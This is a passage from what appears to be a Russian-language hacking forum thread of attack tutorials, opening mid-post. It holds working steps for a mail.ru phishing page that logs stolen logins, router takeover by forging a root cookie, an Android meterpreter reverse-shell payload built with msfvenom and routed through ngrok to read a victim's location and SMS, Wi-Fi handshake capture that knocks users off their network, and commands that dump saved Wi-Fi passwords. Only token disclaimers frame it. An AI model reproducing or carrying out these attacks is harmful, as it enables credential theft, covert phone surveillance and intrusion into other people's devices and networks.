чтобы жертва ничего не заподозрила перенаправляем её на сайт mail с ошибкой входа. Для этого в auth.php перед ?> добавим строку и впишем туда: header('Location: https://account.mail.ru/login?fail=1'); В общем ничего сложного и все уже готово. Пробуем зайти на http://127.0.0.1/login и ввести туда логин и пароль. Нас перенаправит на реальный сайт mail с ошибкой входа, а данные, которые ввёл пользователь, сохраняться в файле /var/www/html/log/login_log.txt Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  22. Взлом роутера обычно является либо самой простой, либо самой сложной задачей - его сложность варьируется от ввода имени пользователя и пароля по умолчанию, и ты максимально заебёшься, пытаясь попасть внутрь роутера по telnet или ssh. В обоих этих случаях перебор паролей не очень полезен, но это довольно простой метод, мы ведь не ищем лёгких путей, да? Однако я скажу тебе следующее: Это все еще роутер, который я использовал в своей домашней сети, потому что он предоставляется моим интернет-провайдером, и поскольку он является одним из основных поставщиков в моей области, многие люди страдают от этих уязвимостей. Ну ладно, теперь к делу. ЭТАП I. НАЙДИ IP РОУТЕРА. Так как это самый простой шаг, и есть бесчисленное множество способов сделать это, я просто приведу несколько различных возможностей: Проверка сетевых настроек с помощью панелей настроек ОСИспользование ipconfig в Windows и ifconfig на машинах Unix из терминалаИспользование Fuzzer в качестве инструмента обнаружения цели.Найденный мной IP роутера - 192.168.0.1 ЭТАП II. СОБЕРИ ТРАФФИК. Я решил, что хороший способ начать, будет исследовать веб-сервер роутера для чего-то за пределами того, что видно невооружённым глазом. По этой причине я использовал HTTPView и проанализировал трафик от первой попытки входа в систему. Чтобы помочь себе, я применил некоторые фильтры, чтобы избавиться от медиа и стилей ответов с сервера. Вот результат, который я добыл: Этой информации нам хватит. ЭТАП III. ПРОАНАЛИЗИРУЙ ТРАФФИК И НАЙДИ УЯЗВИМОСТИ. Теперь, когда у нас есть нужное количество данных, мы должны проанализировать его, чтобы увидеть, наткнулись ли мы на что-то интересное. Сразу можно игнорировать все файлы jQuery, а также языковые файлы или, по крайней мере, не начинать поиск оттуда. Поскольку я работаю в Chrome, я не могу анализировать ответы прямо из HTTPView, поэтому мне нужно реплицировать запрос в Rest и выполнять там анализ. Есть этот интересная штука, которую я нашел в /menu.html Присмотрись хорошенько. Хотя определение функции readCookie отсутствует, можно с уверенностью предположить, что она считывает файл cookie, а userData-это имя этого файла cookie. Из строки 247 мы можем сделать вывод, что значение этого файла cookie должно быть root. Чтобы изменить куки, я использовал расширение EditThisCookie и добавил файл куки с уже упомянутым именем и значением и вуаля, мы внутри.. Всё так просто? ЭТАП IV. ПРОСКАНИРУЙ РОУТЕР НА НАЛИЧИЕ ДРУГИХ ROOT'ОВ. Если мы попытаемся перемещаться в любом месте, мы встретим тот же экран входа в систему. Есть что-то еще, необходимое для изменения настроек роутера. Однако, у нас есть доступ к гораздо большему количеству страниц, поэтому я думаю, что стоит сделать сканирование на маршрутизаторе. Для этого я буду использовать сканер с уже установленным файлом cookie userData=root. В addiotion я включу опцию "направленное сканирование" на вкладке второго пилота, чтобы сканер полагался на мои действия в качестве ввода. После запуска сканера перейдите к 5-10 страницам на маршрутизаторе, которые требуют входа в систему, например /basicSetup.html и / или basicDHCP.html и пусть инструмент делает свою работу. После того, как траффик перестал поступать, мы можем проанализировать результаты для интересных выводов. Для этого я предпочитаю сортировать результаты по пути, чтобы убедиться, что я не пропустил ни одного важного файла или каталога. И через некоторое время я столкнулся с этим: ЭТАП V. ПОЛУЧИ ПОЛНЫЙ КОНТРОЛЬ. DocsisConfigFile.xml - это обычно файл, который содержит кучу полезной информации о конфигурации маршрутизатора, посмотрим, что внутри: Да, всё так просто. Это определенно работает - файд содержит много интересной информации, включая имя пользователя и пароль в обычном тексте, благодаря которым мы и получили полный доступ. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  23. Привет, хакеры, в данной статье поговорим о ngrok и metasploit и способы взлома телефона и получения удаленного доступа к смартфону, используя эти программы. Первым делом переходим на официальный сайт ngrok и создаем аккаунт. Скачивает и устанавливаем инструмент. Ссылка - https://ngrok.com/download Перемещаем иконку запуска на рабочий стол для удобства, запускаем и прописываем следующую строчку: ngrok-stable-linux-amd64.zip После прописываем: ./ngrok authtoken В терминале пишем: ./ngrok tcp 4444 Не забывайте, если вы имеете белый адрес, то данные пункты можно пропустить и даже не использовать Ngrok. Следующим этапом является полноценное создание Payload’а для смартфона. Чтобы создать его будем использовать msfvenom, поэтому используя новую консоль прописываем в ней: msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk Если ngrok вы не использовали, то поле LHOST прописываешь собственный ип-адрес, а в LPORT прописываем 4444. Отлично, payload подготовлен, теперь необходимо передать его нашей жертве. Далее необходимо узнать ip-адрес, используя Kali Linux пишем – “ipconfig”, если у вас установлен Arch, то прописываем “ip a”. Теперь атаку будет производить metasploit, если используете кали, то установке не требуется, он предустановлен. Для запуска прописываем в консоле: msfconsole. И пишем: msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST localhost set LPORT 4444 exploit Когда жертва откроет payload мы сразу же увидим открытую сессию. С этого момента получаем удаленный доступ к телефону жертвы. Для нахождения местоположения необходимо написать: geolocate Также можно скопировать все смс-сообщения при помощи команды: sms_dump Используя подобную незамысловатую схему, вы можете легко получать доступ к чужим смартфонами и работать с инструментами, чтобы использовать полученную информацию. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  24. Привет, хакеры, в данной статье покажу способ взлома Wi-Fi. Это самый простой способ. Есть 2 версии wifite, использовать будем вторую — Wifite2 Работать будем на Kali Linux. Помимо Кали необходим Wi-Fi адаптер. Некоторые Wi-Fi адаптеры могут не подходить и придётся использовать два адаптера. Как в моём случае(TP-Link 722). Если 2 адаптера, программа может спросить какой выбрать. Выбираете адаптер для сканирования сетей. Скачиваем wifite2: git clone https://github.com/derv82/wifite2.git Заходим в директорию: cd wifite2 И запускаем: ./Wifite.py Начался мониторинг сетей. Когда появиться сеть, останавливаете мониторинг (ctrl + c) Выбираете свою сеть обозначив номер 1 сети или выбрав сети от и до. Например: 2 или 2-5. Начинается захват хэндшейка. Мы выкидываем какого-то пользователя с его сети(да,теперь вы видели всё) при попытке переподключиться он обязан ввести пароль. А сессия останавливается и этот пароль сохраняется в текстовом файле. Выводы: если вы отключились от своей точки, задумайтесь. И старайтесь сократить дальность wifi до минимума, не заходя за стены. Взлом чего-либо — незаконно. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  25. Привет, хакеры, продолжаем тему узнавания паролей от беспроводных сетей. В данной статье будет рассказано про способы получения подобной информации на Linux. Как узнать пароль от WiFi на Linux Для подключения к беспроводной сети в Linux Используется либо Network Manager либо WPA Supplicant. Первое является программой с собственным граф. Интерфейсом, а второе подключает компьютер к беспроводной сети, используя стандартную консоль. Оба инструмента сохраняет все настройки в открытую. Однако перед освоением команд, необходимо воспользоваться граф. Интерфейсом, необходимо это для получения информации об подключениях компьютера к различным сетям. Нажимаем на значок беспроводной сети возле часов и тыкаем “Сетевые соединения”. Отлично, видно сети к которым компьютер подключался и подключен прямо сейчас. Для получения пароля берем одну из сетей и нажимаем на ней “Изменить”. После нажимаем на вкладку “Защита Wi-Fi”, где отмечаем пункт “Показывать пароль” Для выполнения данной функции не требуется пароль администратора, то есть выполняется любым пользователем. Ранее оговаривалось, что программа сохраняет все данные в открытом виде: В папке /etc/NetworkManager/system-connections/. Просмотреть файлы ls -l /etc/NetworkManager/system-connections/ Для просмотра названий и паролей вводим: sudo egrep -h -s -A 9 --color -T 'ssid=' /etc/NetworkManager/system-connections/* Вторая программа, использующая командную строку, для проверки подключений хранит всю свою информацию по адресу - /etc/wpa_supplicant.conf. Однако запустить программу можно и при помощи ключа, который указан после файла с неизвестным названием и положением. В случае автоматический загрузки данной программы, есть возможность изучения файла - /etc/rc.local на наличие команды, которая поможет в поиски настроек беспроводной сети. Данный файл можно найти, взглянув на статус службы: systemctl status wpa_supplicant.service В случае ручного запуска программы, поиск осуществляется в данных категориях: grep supplicant ~/.bash_history Просмотр содержимого папки программы: ls -l /etc/wpa_supplicant/ Код для вывода содержимого файла: cat /etc/wpa_supplicant/wpa_supplicant.conf
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.